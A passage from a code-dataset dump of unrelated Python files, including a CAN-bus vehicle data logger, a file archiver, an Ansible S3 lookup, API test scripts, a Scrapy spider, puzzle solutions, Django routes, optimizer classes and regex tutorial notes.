if message.arbitration_id == hf.PID_REPLY and message.data[2] == hf.THROTTLE:
throttle = round((message.data[3]*100)/255)
# Send Engine RPM request
msg = can.Message(arbitration_id=hf.PID_REQUEST,data=[0x02,0x01,hf.ENGINE_RPM,0x00,0x00,0x00,0x00,0x00],extended_id=False)
bus.send(msg)
while(q_CAN.empty() == True):
pass
message = q_CAN.get()
if message.arbitration_id == hf.PID_REPLY and message.data[2] == hf.ENGINE_RPM:
rpm = round(((message.data[3]*256) + message.data[4])/4)
# Send Vehicle speed request
msg = can.Message(arbitration_id=hf.PID_REQUEST,data=[0x02,0x01,hf.VEHICLE_SPEED,0x00,0x00,0x00,0x00,0x00],extended_id=False)
bus.send(msg)
while(q_CAN.empty() == True):
pass
message = q_CAN.get()
if message.arbitration_id == hf.PID_REPLY and message.data[2] == hf.VEHICLE_SPEED:
speed_timeStamp = time.time()
speed = message.data[3]
vspeed2 = speed
time2 = message.timestamp
logged_data = '{0:f}, {0:f}, '.format(time2,speed_timeStamp)
logged_data += '{0:d}, '.format(rpm) + '{0:d}, '.format(speed) + '{0:d}, '.format(throttle)
# calculate distance
if first_time12:
time1 = time2
vspeed1 = vspeed2
first_time12 = False
# convert speed from km/h to m/s
vspeed1 = vspeed1 * 5 / 18
vspeed2 = vspeed2 * 5 / 18
distance += (vspeed2 + vspeed1)*(time2 - time1)/2
distance_total += (vspeed2 + vspeed1)*(time2 - time1)/2
vspeed1 = vspeed2
time1 = time2
# read GPS data
if q_GPS.empty() == True:
pass
else:
new_data = q_GPS.get()
data_stream.unpack(new_data)
curr_lat = data_stream.TPV['lat']
if curr_lat == 'n/a':
curr_lat = 0;
curr_lon = data_stream.TPV['lon']
if curr_lon == 'n/a':
curr_lon = 0;
curr_lat_temp = curr_lat
curr_lon_temp = curr_lon
if prev_lat == curr_lat and prev_lon == curr_lon:
curr_lat_temp = 0
curr_lon_temp = 0
else:
prev_lat = curr_lat
prev_lon = curr_lon
logged_data += str(curr_lat_temp) + ', ' + str(curr_lon_temp)
logged_data += ', {0:f}, {1:f}'.format(distance_total,distance)
print(logged_data)
except KeyboardInterrupt:
#Catch keyboard interrupt
GPIO.output(led,False)
if file_open:
outfile.close()
tx_file.close()
rx_file.close()
# close CAN interface
os.system("sudo /sbin/ip link set can0 down")
print('\n\rKeyboard interrtupt')
|
23,180 | fb1cc5d39a10ffc100de44880f80aceb7545eaf5 | #-*- coding: utf-8 -*-
import os
import time
import textManager
import rule
#import main #import main이라고 써놔서 main.py에서 여기로 넘어올떄 충돌생기는것 같아서 주석처리했습니다. ( by 계)
def printStudentinfo(code):
    """Clear the console and print the "My Page" view for student *code*.

    Returns the student's info array [id, name, phone] from textManager.
    """
    # Print student information
    os.system('cls')
    print("=" * 18, end='')
    print("[마이페이지]", end='')
    print("=" * 21)
    myInfo=textManager.readText_Student_c(code) # fetch the info array for this student id
    print(myInfo[1] + " ( " + myInfo[0] + " ) ")
    print("hp : " + myInfo[2])
    print("수강내역")
    classArr=textManager.Re_UserInfo(code)
    for i in range(len(classArr)):
        print(' - '+classArr[i][1]) # print enrolled course names (original note: '@' replaced with spaces)
    print("="*50)
    return myInfo
def printTeacherinfo(code):
    """Clear the console and print the "My Page" view for teacher *code*.

    Returns the teacher's info array [id, name, phone] from textManager.
    """
    # Print teacher information
    os.system('cls')
    print("=" * 18, end='')
    print("[마이페이지]", end='')
    print("=" * 21)
    myInfo=textManager.readText_Teacher_c(code) # fetch the info array for this teacher id
    print(myInfo[1]+" ( "+myInfo[0]+" ) ")
    print("hp : "+myInfo[2])
    print("개설강의")
    classArr=textManager.Re_UserInfo(code)
    for i in range(len(classArr)):
        print(' - '+classArr[i][1]) # print opened course names (original note: '@' replaced with spaces)
    print("="*50)
    return myInfo
def modifyInfo(code,myInfo):
    """Interactive "edit my info" menu; always returns 0 back to My Page."""
    # Info-edit screen
    while True:
        printModifyinfo(code)
        print("1. 이름수정\n2. 전화번호수정\n3. 뒤로가기")
        choice = input("원하시는 항목을 선택해 주세요 : ") or '입력 실패'
        if choice == '입력 실패':
            print("데이터 값을 입력해 주세요.")
            time.sleep(2)
            os.system('cls')
            continue
        elif rule.numberRule(choice)==0: # apply numeric-input rule; `import main` was commented out so rule is used directly
            time.sleep(2)
            os.system('cls')
            return 0
        elif choice == '1':
            if modifyName(code,myInfo)==1:
                print("정보가 성공적으로 수정되었습니다.")
                time.sleep(2)
                os.system('cls')
            # Return to the My Page screen.
            return 0
        elif choice == '2':
            if modifyPhone(code,myInfo)==1:
                print("정보가 성공적으로 수정되었습니다.")
                time.sleep(2)
                os.system('cls')
            # Return to the My Page screen.
            return 0
        elif choice == '3':
            return 0
        else:
            print("선택지 내의 숫자를 입력하여주세요")
            time.sleep(2)
            os.system('cls')
            #printModifyinfo(code) disabled to match the spec document (by Choi)
            return 0
def printModifyinfo(code):
    """Clear the console and print the header of the info-edit view."""
    # Info shown on the edit screen; 'S'-prefixed codes are students.
    os.system('cls')
    print("=" * 18, end='')
    print("[정보 수정]", end='')
    print("=" * 21)
    if code[0] == 'S':
        myInfo = textManager.readText_Student_c(code)
    else:
        myInfo = textManager.readText_Teacher_c(code)
    print(myInfo[1] + " ( " + myInfo[0] + " ) ")
    print("hp : " + myInfo[2])
    print("=" * 50)
def modifyName(code,myInfo):
    """Prompt for a new name (max 10 chars); return 1 on success, 0 on error."""
    # Edit name
    print(myInfo[1], end="")
    newName = input(">>>") or '입력 실패'
    if len(newName) > 10:
        print("형식에 어긋납니다. 다시 입력하십시오")
        time.sleep(2)
        os.system('cls')
        return 0
    elif newName=='입력 실패':
        print('변경할 값을 입력해주십시오')
        time.sleep(2)
        os.system('cls')
        return 0
    else:
        textManager.RenewalName(code, myInfo[1], newName) # persist the change
        return 1
def modifyPhone(code,myInfo):
    """Prompt for an 11-digit phone number; return 1 on success, 0 on error."""
    # Edit phone number
    print(myInfo[2], end="")
    newPhone = input(">>>") or '입력 실패'
    if len(newPhone) == 11 and newPhone.isdecimal(): # kept as str: converting to int would break len()
        # Update the phone number.
        # NOTE(review): reuses textManager.RenewalName to replace the
        # phone field -- confirm that helper replaces arbitrary fields.
        textManager.RenewalName(code, myInfo[2], newPhone) # persist the change
        return 1
    elif newPhone=='입력 실패':
        print("데이터 값을 입력해 주세요")
        time.sleep(2)
        os.system('cls')
        return 0
    else:
        print("형식에 맞게 다시 입력하십시오")
        time.sleep(2)
        os.system('cls')
        return 0
def screen(code):
    """Top-level My Page loop: render info and dispatch menu choices."""
    while True:
        # Render the main screen; 'S'-prefixed codes are students.
        if code[0]=='S':
            myInfo=printStudentinfo(code)
        else:
            myInfo =printTeacherinfo(code)
        print("1. 정보수정\n2. 뒤로가기")
        choice = input("원하시는 항목을 선택해 주세요 : ") or '입력 실패'
        if choice=='입력 실패':
            print('데이터 값을 입력해 주세요.')
            time.sleep(2)
            os.system('cls')
            continue
        # Numeric-input rule
        elif rule.numberRule(choice)==0: # apply numeric-input rule; `import main` was commented out so rule is used directly
            time.sleep(2)
            os.system('cls')
            continue
        # Menu dispatch
        elif choice == '1':
            # Go to "1. edit info"
            os.system('cls')
            modifyInfo(code, myInfo)
        elif choice == '2':
            # "2. go back" -- leave the My Page loop
            return 0
        else:
            print("선택지 내의 숫자를 입력하여주세요") # numeric-input rule should apply here too
            time.sleep(2)
            os.system('cls')
            continue
23,181 | 8384bc3e8af76f66ff89c79b94dd89484e7a46ce |
import sys, os
from os import walk
from os import listdir
from os.path import isfile, join
import shutil
import time
import getopt
import re #RegEx
#import yaml
class ArchiveFiles:
def __init__(self, date):
#Initializes a dict called job
self.date = date
def _backupLog(self, updateText):
""" Function used to log actions (copied files, deleted files, etc)."""
aFile = "archiving_log.txt"
os.rename( aFile, aFile+"~")
destination= open( aFile, "w" )
source= open( aFile+"~", "r" )
for line in source:
destination.write( line )
destination.write( str(updateText))
source.close()
destination.close()
os.remove(aFile+"~")
# 2) Copy Data
#Should copy data to other folder, and log the name of copied file into backup file
#Should implement only to files with certain dates
def _archiveData(self, src, dest):
"""Goes through files inside directory structure ."""
root = os.getcwd()
srcPath = join(root,src)
destPath = join(root,dest)
f = [] #Array with list of files to copy
s = [] #Array with list of files successfully copied
for (dirpath, dirnames, filenames) in walk(srcPath):
f.extend(filenames)
if len(f) > 0:
for i in f:
if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py':
try:
buffer_size = int(20000)
fileSrcPath = join(dirpath, i)
fileDestPath = join(destPath, i)
with open(fileSrcPath, 'rb') as fsrc:
with open(fileDestPath, 'wb') as fdest:
copy = shutil.copyfileobj(fsrc,fdest,buffer_size)
copy
self._backupLog('Copy Operation File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\t'+ 'Path: '+ str(srcPath)+'\n')
s.append(i)
except shutil.Error as e:
self._backupLog('Error: %s' % e + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except IOError as e:
self._backupLog('Error: %s' % e.strerror + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
if len(s) >0:
for (dirpath,dirnames,filenames) in walk(srcPath):
for cfile in f:
for sfile in s:
if cfile == sfile:
try:
filetoDelete = join(srcPath, cfile)
os.remove(filetoDelete)
self._backupLog('Delete Operation File: '+str(cfile)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except OSError, e:
self._backupLog('Error deleting file: %s - %s.' % (e.filename, e.strerror) + '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
def _archiveDataByDate(self, src, dest):
"""Goes through files inside directory structure ."""
root = os.getcwd()
srcPath = join(root,src)
destPath = join(root,dest)
f = [] #Array with list of files in directory
fDate = [] #Array with list of files with certain date;
s = [] #Array with list of files successfully copied
for (dirpath, dirnames, filenames) in walk(srcPath):
f.extend(filenames)
if len(f) > 0:
for i in f:
match = re.search(r'\d{4}-\d{2}-\d{2}', i)
if str(i) != 'archiving_log.txt' and str(i) != 'archiving_log.txt~' and str(i) != 'archivingScript.py' and match.group() == self.date:
try:
buffer_size = int(20000)
fileSrcPath = join(dirpath, i)
fileDestPath = join(destPath, i)
with open(fileSrcPath, 'rb') as fsrc:
with open(fileDestPath, 'wb') as fdest:
copy = shutil.copyfileobj(fsrc,fdest,buffer_size)
copy
self._backupLog('Copy Operation File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) +'\n') #+ '\t'+ 'Path: '+ str(srcPath)
s.append(i)
except shutil.Error as e:
self._backupLog('Error: %s' % e + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except IOError as e:
self._backupLog('Error: %s' % e.strerror + '\t' + 'File: '+str(i)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
if len(s) >0:
for (dirpath,dirnames,filenames) in walk(srcPath):
for cfile in f:
for sfile in s:
if cfile == sfile:
try:
filetoDelete = join(srcPath, cfile)
os.remove(filetoDelete)
self._backupLog('Delete Operation File: '+str(cfile)+ '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
except OSError, e:
self._backupLog('Error deleting file: %s - %s.' % (e.filename, e.strerror) + '\t' + 'Time: '+ str(time.strftime("%H:%M:%S")) + '\n')
def Run(self):
"""Executes the job."""
src = 'testFolder'
dest = 'testFolder2'
self._backupLog('\n' + 'Starting Archiving Job - Archiving Files of date: ' + str(time.strftime("%Y-%m-%d")) + '\n' )
self._backupLog('Archiving Job Start Time: ' + str(time.strftime("%H:%M:%S")) + '\n' )
self._archiveDataByDate(src,dest)
self._backupLog('\n' + 'Archiving Job End Time: ' + str(time.strftime("%H:%M:%S")) + '\n' )
#End of Class ArchiveFiles
def main():
"""Main function of the script that executes all necessary functions."""
today = str(time.strftime("%Y-%m-%d"))
#today = '2014-10-25'
date = today
try:
#User can specify himself the keys or let system read from local file.
opts, args = getopt.getopt(sys.argv[1:], '', ['date='])
except getopt.error, msg:
print 'python archivingScript.py --date [dateToArchive]'
sys.exit(2)
for option, arg in opts:
if option == '--date':
date = arg
job = ArchiveFiles(date)
job.Run()
if __name__ == '__main__':
main()
|
23,182 | d5e683c1f31d9c43f3aee00a8db856332b68f7a0 | """
https://github.com/Voronenko/ansible-developer_recipes/tree/master/ansible_extras
Description: This lookup takes an AWS region and an s3 bucket name.
Example Usage:
{{ lookup('aws_s3_bucket_exists', 'bucketname') }}
"""
from __future__ import (absolute_import, division, print_function)
from ansible.errors import (AnsibleError, AnsibleLookupError)
from ansible.plugins.lookup import LookupBase
import os
__metaclass__ = type
if os.getenv('AWS_ACCESS_KEY_ID') is not None:
AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
if os.getenv('AWS_SECRET_ACCESS_KEY') is not None:
AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
try:
from boto.s3.connection import S3Connection
except ImportError:
raise AnsibleError("aws_vpc_id_from_name lookup cannot be run without boto installed")
class LookupModule(LookupBase):
    """Ansible lookup: return the bucket name if the S3 bucket exists."""
    def run(self, terms, variables=None, **kwargs):
        """Look up terms[0] as an S3 bucket name.

        Raises AnsibleLookupError if the bucket does not exist.
        """
        # NOTE(review): `basestring` exists only on Python 2; on a
        # Python 3 Ansible controller this line raises NameError --
        # confirm the target interpreter.
        if isinstance(terms, basestring):
            terms = [terms]
        bucket_name = terms[0]
        # Credentials come from the module-level AWS_* globals, which are
        # only bound when the corresponding environment variables are set.
        conn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
        bucket = conn.lookup(bucket_name)
        if bucket is None:
            raise AnsibleLookupError("Bucket %s not found" % bucket_name)
        return [bucket_name.encode('utf-8')]
|
23,183 | 54134da8f8cc8f72e3dea15f8584c488339552a3 | import requests
from login import login
from utils import get_url_info
from utils import get_jsonstring_info
import init_fund_account_in_db
import advertising
import del_ads_in_db
currency_tuple = ('BYC', 'BTC', 'ETH', 'KBC', 'NZ', 'USDT')
#payment_dict = {"bankcard": 1, "Alipay": 2, "WeChatPay": 4}
def getBuyAdList(user_name='17727820013', password='123456', currency=None):
    """
    Fetch the ids of the merchant's published buy advertisements.

    Logs in with the given credentials, walks result pages 1-9 and
    collects every advertisingOrderId.  On any failure the exception is
    printed and the function falls through, returning None.
    """
    try:
        ad_order_list = []
        mytoken = login(login_num=user_name, password=password)["data"]["token"]
        headers = {"token": str(mytoken)}
        for each_page in range(1, 10):
            jsonString = get_jsonstring_info.get_buy_ad_list_jsonString %(repr(currency), each_page)
            data = dict(jsonString=jsonString)
            r = requests.post(get_url_info.get_ad_list_url, data=data, headers=headers)
            ad_order_list.extend(r.json()['data']['list'])
        return [x['advertisingOrderId'] for x in ad_order_list]
    except Exception as err:
        # NOTE(review): broad catch -- callers must handle a None result.
        print(err)
def getSellAdList(user_name='17727820013', password='123456', currency=None):
    """
    Fetch the ids of the merchant's published sell advertisements.

    Logs in with the given credentials, walks result pages 1-9 and
    collects every advertisingOrderId.  On any failure the exception is
    printed and the function falls through, returning None.
    """
    try:
        ad_order_list = []
        mytoken = login(login_num=user_name, password=password)["data"]["token"]
        headers = {"token": str(mytoken)}
        for each_page in range(1, 10):
            jsonString = get_jsonstring_info.get_sell_ad_list_jsonString %(repr(currency), each_page)
            data = dict(jsonString=jsonString)
            r = requests.post(get_url_info.get_ad_list_url, data=data, headers=headers)
            ad_order_list.extend(r.json()['data']['list'])
        return [x['advertisingOrderId'] for x in ad_order_list]
    except Exception as err:
        # NOTE(review): broad catch -- callers must handle a None result.
        print(err)
if __name__ == "__main__":
"""
print("......初始化法币资金账户的NZ......")
init_fund_account_in_db.initUserFundAccount(fund_type='UserCoin2CoinFunds',
user_name='手机商家', currency='NZ', available_balance=10000, frozen_balance=0)
print('......发布11条1CNY的广告......')
for i in range(11):
advertising.limitedPriceBuyAd(user_name="17727820013", currency="NZ", price=1, amount=1000,
floor=100, ceiling=1000)
"""
print('......获取这些广告id......')
#r = getMerchantBuyAd(user_name='17727820013', password='123456', currency='NZ')
#print(r)
"""
for i in [x["advertisingOrderId"] for x in r if (x['type'] == 2)]:
print(i)
"""
advertising.limitedPriceBuyAd(currency='BTC', price=1, amount=1000, floor=1, ceiling=1000)
advertising.marketPriceSellAd(currency='BTC', amount=1000, floor=1, ceiling=1000)
r1 = getBuyAdList(user_name='17727820013', password='123456', currency='BTC')
print(r1)
r2 = getSellAdList(currency='BTC')
print(r2)
|
23,184 | 35ab1487834fd190e0e07d97f3b9b6ebbb5553ea | f = open('input12.txt','r')
pos = [0,0]
dir = [1,0]
def dir_change(cdir, change):
    """Rotate the unit direction vector *cdir* per a turn instruction.

    The caller passes `l[:3]`, so 180/270-degree turns arrive truncated
    ('R18', 'L27').  This version accepts both those truncated tokens and
    full tokens ('R180', 'L270') instead of relying on exact matches.
    Returns the rotated [dx, dy] list, or None for unknown instructions
    (same as the original implicit fall-through).
    """
    turn, degrees = change[0], change[1:]
    if degrees.startswith('18'):
        # 180 degrees: mirror both axes regardless of turn direction.
        return [-cdir[0], -cdir[1]]
    clockwise = (turn == 'R' and degrees.startswith('9')) or \
                (turn == 'L' and degrees.startswith('27'))
    if clockwise:
        # Right 90 / left 270.
        return [cdir[1], -cdir[0]]
    counterclockwise = (turn == 'L' and degrees.startswith('9')) or \
                       (turn == 'R' and degrees.startswith('27'))
    if counterclockwise:
        # Left 90 / right 270.
        return [-cdir[1], cdir[0]]
for l in f.readlines():
if l[0] == 'N':
pos[1] += int(l[1:-1])
elif l[0] == 'S':
pos[1] -= int(l[1:-1])
elif l[0] == 'E':
pos[0] += int(l[1:-1])
elif l[0] == 'W':
pos[0] -= int(l[1:-1])
elif l[0] == 'F':
pos[0] += int(l[1:-1])*dir[0]
pos[1] += int(l[1:-1])*dir[1]
elif l[0] == 'R' or l[0] == 'L':
dir = dir_change(dir,l[:3])
print("part 1 sol = " + str(abs(pos[0]) + abs(pos[1])))
f.close()
# PART 2
f = open('input12.txt','r')
def dir_change_wp(cdir, change):
    """Rotate the waypoint vector *cdir* per a turn instruction (part 2).

    Identical rotation math to dir_change; kept separate to mirror the
    original script structure.  Accepts both the truncated tokens the
    caller passes via `l[:3]` ('R18', 'L27') and full tokens ('R180',
    'L270').  Returns None for unknown instructions, as before.
    """
    turn, degrees = change[0], change[1:]
    if degrees.startswith('18'):
        # 180 degrees: mirror both axes.
        return [-cdir[0], -cdir[1]]
    clockwise = (turn == 'R' and degrees.startswith('9')) or \
                (turn == 'L' and degrees.startswith('27'))
    if clockwise:
        # Right 90 / left 270.
        return [cdir[1], -cdir[0]]
    counterclockwise = (turn == 'L' and degrees.startswith('9')) or \
                       (turn == 'R' and degrees.startswith('27'))
    if counterclockwise:
        # Left 90 / right 270.
        return [-cdir[1], cdir[0]]
ship = [0,0]
wp = [10,1]
for l in f.readlines():
if l[0] == 'N':
wp[1] += int(l[1:-1])
elif l[0] == 'S':
wp[1] -= int(l[1:-1])
elif l[0] == 'E':
wp[0] += int(l[1:-1])
elif l[0] == 'W':
wp[0] -= int(l[1:-1])
elif l[0] == 'F':
ship[0] += int(l[1:-1])*wp[0]
ship[1] += int(l[1:-1])*wp[1]
elif l[0] == 'R' or l[0] == 'L':
wp = dir_change_wp(wp,l[:3])
print("part 2 sol = " + str(abs(ship[0]) + abs(ship[1])))
|
23,185 | ac58f4e8a6b4f3af7d14b156c595a9cbfed70b45 | # -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from meimeiproject.items import MeimeiprojectItem
import urllib.request
import urllib.parse
import re
class MeituSpider(CrawlSpider):
    """Crawl meizitu.com listing pages and yield (name, image_url) items."""
    name = 'meitu'
    allowed_domains = ['www.meizitu.com']
    start_urls = ['http://www.meizitu.com/a/more_1.html']
    rules = (
        # Follow every "more_N.html" listing page and parse its gallery table.
        Rule(LinkExtractor(allow=r'more_\d+\.html'), callback='parse_table', follow=True),
    )
    def parse_table(self, response):
        """Extract each gallery link from a listing page and request it."""
        div_list = response.xpath('//div[@class="inWrap"]/ul[@class="wp-list clearfix"]/li[@class="wp-item"]')
        for div in div_list:
            item = MeimeiprojectItem()
            # item['info'] = div.xpath('./div[@class="con"]/div[@class="pic"]/a/img/@alt').extract_first()
            link = div.xpath('./div[@class="con"]/div[@class="pic"]/a/@href').extract_first()
            # yield item
            # Fixed desktop User-Agent to avoid bot blocking.
            headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
            yield scrapy.Request(url=link, callback=self.parse_info, meta={'item': item}, headers=headers)
    def parse_info(self, response):
        """Parse a gallery page and yield one item per image found."""
        # Retrieve the item passed along via request meta.
        item = response.meta['item']
        # Continue parsing this page to fill in the remaining item fields.
        # item['tags'] = response.xpath('//div[@class="postmeta clearfix"]/div[@class="metaRight"]/p/text()').extract_first()
        div_list = response.xpath('//div[@class="postContent"]/div[@id="picture"]/p')
        for div in div_list:
            name_list = div.xpath('./img/@alt').extract()
            image_list = div.xpath('./img/@src').extract()
            # for image in image_list:
            #     item['image_url'] = image
            # for name1 in name_list:
            #     item['name'] = name1
            #     yield item
            # NOTE(review): assumes alt and src lists have equal length;
            # an <img> missing its alt attribute would raise IndexError.
            for i in range(len(image_list)):
                item['image_url'] = image_list[i]
                item['name'] = name_list[i]
                yield item
|
def raindrops(number):
    """Return the raindrop sounds for *number*.

    Appends 'Pling'/'Plang'/'Plong' for divisibility by 3/5/7 (in that
    order); falls back to the decimal string when none divide it.
    """
    sounds = ''
    for factor, noise in ((3, 'Pling'), (5, 'Plang'), (7, 'Plong')):
        if number % factor == 0:
            sounds += noise
    return sounds if sounds else str(number)
|
23,187 | 57f8967ae98065a695245dffe01a179adbf739a3 | from django.urls import path
from . import views
# URL namespace used when reversing, e.g. reverse('app:detail').
app_name = 'app'
urlpatterns = [
    # "/app"
    path('', views.index, name='index'),
    # "/app/<id>/" -- question detail view
    path('<int:question_id>/', views.detail, name='detail'),
    # "/app/<id>/results/" -- results view for a question
    path('<int:question_id>/results/', views.results, name='results'),
    # "/app/<id>/favorite/" -- favorite action for a question
    path('<int:question_id>/favorite/', views.favorite, name='favorite')
]
|
# Collect midterm/final scores per student, compute weighted averages
# (30% + 30% + 40%), and report the students averaging 90 or above.
studentsScores = []
averages = []
amount_of_student = int(input("How many students are there? "))
for student_no in range(1, amount_of_student + 1):
    print("Student", student_no)
    midterm1 = float(input("Enter your first midterm:"))
    midterm2 = float(input("Enter your second midterm:"))
    final = float(input("Enter your final score:"))
    studentsScores.append([midterm1, midterm2, final])
print(studentsScores)
for scores in studentsScores:
    avg = 0
    avg = avg + scores[0] * 0.3
    avg = avg + scores[1] * 0.3
    avg = avg + scores[2] * 0.4
    averages.append([avg])
print("Average of students points", averages)
clevers = []
for idx, avg_entry in enumerate(averages, start=1):
    if avg_entry[0] >= 90:
        clevers.append(["Student", str(idx), avg_entry])
print(clevers)
|
23,189 | f60efa75d3978a9fb4b720cf04522d267c1562f7 | from matplotlib import pyplot as plt
if __name__ == '__main__':
plt.style.use('fivethirtyeight')
slices = [59219, 55466, 47544, 36443, 35917, 31991, 27097, 23030, 20524, 18523, 18017, 7920, 7331, 7201, 5833]
labels = ['JavaScript', 'HTML/CSS', 'SQL', 'Python', 'Java', 'Bash/Shell/PowerShell', 'C#', 'PHP', 'C++',
'TypeScript', 'C', 'Other(s):', 'Ruby', 'Go', 'Assembly']
# colors = ['#008fd5', '#fc4f30', '#e5ae37', '#6d904f']
explode = [0, 0, 0, 0.2, 0]
plt.pie(
slices[:5],
labels=labels[:5],
shadow=True,
startangle=90,
explode=explode,
wedgeprops={'edgecolor': 'black'},
autopct='%1.1f%%'
)
plt.title("Pie Chart")
plt.tight_layout()
plt.show()
|
23,190 | cdfd3f7b7726585399de5a6857624c127ca969dc |
class ABCSummary:
    """Thin wrapper around a user-supplied summary-statistics function."""
    def __init__(self, summary):
        # The callable must return an array-like exposing .flatten().
        self.summary = summary
    def summarize(self, data):
        """Apply the wrapped summary function and return it flattened to 1-D."""
        stats = self.summary(data)
        return stats.flatten()
|
23,191 | d9553623dd146834f518b5f379001585b339cf41 |
from __future__ import print_function
import numpy as np
class SGD:
    """Vanilla stochastic gradient descent with optional weight decay.

    Each parameter is a dict with 'val' and 'grad' array entries; `reg`
    adds an L2-style shrinkage term `reg * val` to every update.
    """
    def __init__(self, params, lr=0.001, reg=0):
        self.parameters = params
        self.lr = lr
        self.reg = reg
    def step(self):
        """Apply one in-place update to every parameter."""
        for p in self.parameters:
            update = self.lr * p['grad'] + self.reg * p['val']
            p['val'] -= update
class SGDMomentum:
    """SGD with an exponential moving average of gradients (momentum).

    velocity <- rho * velocity + (1 - rho) * grad
    val      <- val - (lr * velocity + reg * val)
    """
    def __init__(self, params, lr=0.001, momentum=0.99, reg=0):
        self.l = len(params)
        self.parameters = params
        # One zero-initialized velocity buffer per parameter.
        self.velocities = [np.zeros(p['val'].shape) for p in params]
        self.lr = lr
        self.rho = momentum
        self.reg = reg
    def step(self):
        """Apply one momentum-smoothed in-place update to every parameter."""
        for idx in range(self.l):
            vel = self.rho * self.velocities[idx] + (1 - self.rho) * self.parameters[idx]['grad']
            self.velocities[idx] = vel
            self.parameters[idx]['val'] -= self.lr * vel + self.reg * self.parameters[idx]['val']
|
23,192 | 6020a503cfef566cee55d6dc42751465fb981951 | count = 10 #עובר על כל המספרים הדו ספרתיים (10-99), ומדפיס את סכום המספרים שמסתיימים בספרה 0
sum = 0
while count>9 and count<100:
if count%10 == 0:
sum += count
count +=1
print(sum) |
23,193 | 438fbe201d8e24ab722a983220474666e87b735e | # https://developers.google.com/edu/python/regular-expressions
# NOTE(review): scratch/tutorial script of `re` module examples, meant to be
# stepped through interactively (REPL-style bare expressions) — not imported.
# Several lines below intentionally or accidentally raise; see NOTE comments.
# https://docs.python.org/3/howto/regex.html
'''
Check out the following links for more information:
https://docs.python.org/3/howto/regex.html
https://docs.python.org/3/library/re.html
https://docs.python.org/3/howto/regex.html#greedy-versus-non-greedy
Shout out to https://regex101.com, which will explain each stage of a regex.
https://regexcrossword.com/
'''
import re
'''
search('r'pattern,text) : serach pattern in test, 'r' flag = raw string. which passes through backslashes without change which is very handy for regular expressions
importance of rflag
in particular, \b matches empty string specifically at the start and end of a word.
re expects the string \b, however normal string interpretation '\b' is converted to the ASCII backspace character,
so you need to either explicitly escape the backslash ('\\b'), or tell python it is a raw string (r'\b').
'''
re.findall('\b', 'testb') # without r flag , the backslash gets consumed by the python string interpreter and '\b' is converted to the ASCII backspace character. re module gets backspace.
#[]
re.findall('\\b', 'test') # backslash is explicitly escaped and is passed through to re module
#['', '']
re.findall(r'\b', 'test') # often this syntax is easier
#['', '']
'''
Search for pattern 'iii' in string 'piiig'.
On success, result.group() is resulted text.
# result[0] - the whole string
# result[1] - first group
# result[2] - second group and so on
'''
result = re.search(r'iii', 'piiig') # found, result.group() == "iii"
result = re.search(r'igs', 'piiig') # not found, result == None
if result != None:
    result[0]
'''
\b Returns a match where the specified characters are at the beginning or at the end of a word
(the "r" in the beginning is making sure that the string is being treated as a "raw string")
r"\bain"
r"ain\b"
'''
result = re.search(r'\bain', 'it is aining asas') # found,'ain
result[0]
#if r flag is not used, \b is treated as a backspace
result = re.search('\bain', 'it is aining') # not found
## . = any single char but \n, so ... means 3 chars must result
result = re.search(r'..g', 'p1kgx') # found, result.group() == "1kg"
## \d = digit char,
# \w = alphanumeric and _ [a-zA-Z0-9_]
# In example below, 3 digits and 3 chars must result
result = re.search(r'\d\d\d', 'p123g') # found, result.group() == "123"
result = re.search(r'\w\w\w', '@@ab_1d!!') # found, result.group() == "ab1"
type(result)
result[0]
''' Repeatition
Things get more interesting when you use + and * to specify repetition in the pattern
+ -- 1 or more occurrences of the pattern to its left, e.g. 'i+' = one or more i's
* -- 0 or more occurrences of the pattern to its left
? -- result 0 or 1 occurrences of the pattern to its left
Leftmost & Largest
'''
## i+ = one or more i's, as many as possible.
result = re.search(r'pi+', 'piiig') # found, result.group() == "piii"
## Finds the first/leftmost solution, and within it drives the +
## as far as possible (aka 'leftmost and largest').
## In this example, note that it does not get to the second set of i's.
result = re.search(r'i+', 'piigiiii') # found, result.group() == "ii"
## \s* = zero or more whitespace chars
## Here look for 3 digits, possibly separated by whitespace.
result = re.search(r'\d\s*\d\s*\d', 'xx1 2 3xx') # found, result.group() == "1 2 3"
result = re.search(r'\d\s*\d\s*\d', 'xx12 3xx') # found, result.group() == "12 3"
result = re.search(r'\d\s*\d\s*\d', 'xx123xx') # found, result.group() == "123"
## ^ = results the start of string, so this fails:
result = re.search(r'^b\w+', 'foobar') # not found, result == None
## but without the ^ it succeeds:
result = re.search(r'b\w+', 'foobar') # found, result.group() == "bar"
## ? = 0 or 1 occurance
result = re.search(r'ssa?', 'ssa') # found, result.group() == "ssa"
result = re.search(r'ssa?', 'sdf') # not found
result = re.search(r'ssa?', 'ssdf') # found, result.group() == "ss"
#escape a special char e.g. \.
# @ does not need to be escaped. However if escaped , it does not make a difference and the result is the same
#square brackets
'''
Square brackets can be used to indicate a set of chars, so [abc] resultes 'a' or 'b' or 'c'.
The codes \w, \s etc. work inside square brackets too.
In sets, +, *, ., |, (), $,{} has no special meaning, so
[+] means: return a match for any '+' character in the string
dot (.) just means a literal dot.
For the emails problem, the square brackets are an easy way to add '.' and '-' to the set of chars which can appear around the @ with the pattern r'[\w.-]+@[\w.-]+'
\=
'''
result = re.search(r'[\w.-]+\@1[2-9]+', 'x@1122') # not found
